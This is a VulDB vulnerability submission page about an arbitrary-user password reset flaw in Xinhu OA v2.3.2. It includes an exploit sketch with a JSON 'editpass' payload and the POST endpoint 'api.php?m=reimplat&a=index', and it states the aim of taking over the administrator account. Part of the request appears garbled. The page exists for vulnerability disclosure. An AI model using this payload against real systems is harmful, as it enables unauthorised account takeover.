Invia #212444: Any user's password modification vulnerability in Xinhuo OA V2.3.2informazioni

TitoloAny user's password modification vulnerability in Xinhuo OA V2.3.2
DescrizioneXinghu OA v2.3.2 has a vulnerability in changing the password of any user in the frontend. An attacker can use this vulnerability to change the administrator password and successfully log in to the backend. ​ 1、The payload generated to change the password is as follows: The data passed in is $data='{"msgtype":"editpass","user":"rock","pass":"123"}';, user is the username and pass is the password to be changed. 2、Send request package: POST /xinhu/api.php?m=reimplat&a=index HTTP/1.1 31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UqdTHn1OQWtPFrKuIalKTZGNW4g
Fonte⚠️ https://github.com/magicwave18/vuldb/issues/1
Utente
 magicwave18 (UID 52598)
Sottomissione24/09/2023 12:47 (3 anni fa)
Moderazione29/09/2023 16:27 (5 days later)
StatoAccettato
Voce VulDB240926 [Xinhu RockOA 1.1/2.3.2/15.X3amdi Password api.php?m=reimplat&a=index escalationi di privilegi]
Punti20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!